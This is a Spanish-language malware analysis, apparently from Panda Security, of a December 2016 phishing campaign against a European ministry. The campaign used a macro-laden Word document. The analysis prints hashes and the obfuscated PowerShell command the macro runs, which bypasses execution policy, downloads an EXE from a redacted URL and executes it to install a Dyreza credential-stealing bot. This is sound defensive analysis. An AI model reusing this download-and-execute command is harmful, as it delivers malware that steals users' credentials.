Las ciberamenazas constituyen un riesgo constante que afecta de manera significativa a las Administraciones Públicas. Tanto es así que se han convertido en un potente instrumento de agresión contra las entidades públicas y los ciudadanos. De tal forma que pueden llegar provocar un serio deterioro en la calidad del servicio y sobre todo fuga de información, desde datos de los ciudadanos hasta secretos de estado.
Si a la adopción de las nuevas tecnologías por parte de las entidades públicas le añadimos el incremento en la complejidad de los ataques y la profesionalización de los ciberdelincuentes, tendencias recogidas para este 2017, la combinación resulta altamente peligrosa.
El pasado mes de diciembre se realizó una campaña masiva de spam distribuida en más de 10 países y que, en el caso analizado, fue dirigido a un importante Ministerio europeo. El ataque, mediante la técnica de “phishing”, era avanzado y aunaba técnicas de ingeniería social con un potente troyano.
El ataque es enviado por correo electrónico con un documento Word adjunto. En un primer momento llegamos a sospechar de que se trataba de un ataque dirigido, ya que el mensaje procedía supuestamente de una empresa de sanidad y el destinatario era un trabajador del ministerio de sanidad de un país europeo.
El presente análisis describe las funcionalidades técnicas del código dañino presente en la macro del documento Word analizado. El objetivo de la macro era realizar la descarga y ejecución de otro componente malicioso.
Características
A continuación se muestran algunas propiedades estáticas de los ficheros analizados
El hash del documento Word es la siguiente:
| MD5 | B480B7EFE5E822BD3C3C90D818502068 |
| SHA1 | 861ae1beb98704f121e28e57b429972be0410930 |
La fecha interna de creación del documento según sus metadatos fue 2016-12-19
La firma del código maliciosos descargado por el Word es la siguiente:
| MD5 | 3ea61e934c4fb7421087f10cacb14832 |
| SHA1 | bffb40c2520e923c7174bbc52767b3b87f7364a9 |
Ejecución
Vectores de infección:
El documento word llega al equipo del usuario mediante la recepción de un correo de spam procedente de una empresa de sanidad. En el texto se hace creer al usuario que el contenido enviado está protegido y que necesita ejecutar la macro para acceder al mismo.
Según los datos recogidos por la Inteligencia Colectiva de Panda Security, esta campaña de spam tuvo lugar el día 19 de diciembre del 2016 y afectó a varios países.
La mayoría de usuarios trató de abrir el documento de Word el día que lo recibieron, 19 de diciembre.
Interacciones con el sistema afectado
La funcionalidad básica de la macro del documento Word consiste en realizar la descarga y ejecución de otro código malicioso desde una url que tiene embebida dentro de la misma macro.
Tanto la macro como sus cadenas se encuentran ofuscadas. Además la macro está preparada para ejecutarse directamente en cuanto el usuario abra el documento.
Una vez ejecutada la macro, el Word ejecuta el siguiente comando en el sistema:
cmd.exe /c pOWeRsHELL.EXe -eXecUTIONpolICy BYPAss -noPrOfIlE -winDowsTyle hidDEN (NeW-oBjECt sYstEm.NeT.webcLiENt).DOWNloAdFILE(‘http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe’,’C:\Users\????\AppData\Roaming.Exe’);STaRt-PRoCESS ‘C:\Users\????\AppData\Roaming.eXe’
El símbolo del sistema (cmd.exe) ejecuta el powershell con dos comandos embebidos pasados por argumentos:
1- El primer comando del powershell, va a realizar la descarga un EXE desde la url ‘http://xxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe’ en %APPDATA%.exe, lo que genera un fichero en la ruta raiz de APPDATA
2- El siguiente comando de powershell (Start-process), sirve para ejecutar el fichero descargado.
3- Gracias a los datos obtenidos mediante la Inteligencia Colectiva de Panda Security sabemos que el código malicioso final que se ha distribuido en esta campaña es una variante de la familia Dyreza. Los clientes de Panda estaban protegidos de forma proactiva, sin necesidad de firmas ni actualizaciones.
Este código malicioso tiene el objetivo de robar las credenciales de los navegadores y añadir la máquina comprometida a una red de bots. Queda a la espera de recibir comandos del Command & Control Server por parte de los ciberdelincuentes que lo manejan, pudiendo descargar nuevo malware o realizar todo tipo de acciones maliciosas.
La digitalización en la Administración Pública lleva al crecimiento exponencial de la generación, almacenamiento y gestión de cantidades de datos confidenciales. Datos que no se pueden permitir ni un solo descuido.
Panda Security es una empresa especializada en la creación de productos de seguridad para endpoints que son parte del portfolio de soluciones de seguridad IT de WatchGuard. Centrada inicialmente en la creación de software antivirus, la compañía ha ampliado sus objetivos expandiendo su línea de negocio hacia los servicios de ciberseguridad avanzada con tecnologías para la prevención del cibercrimen.
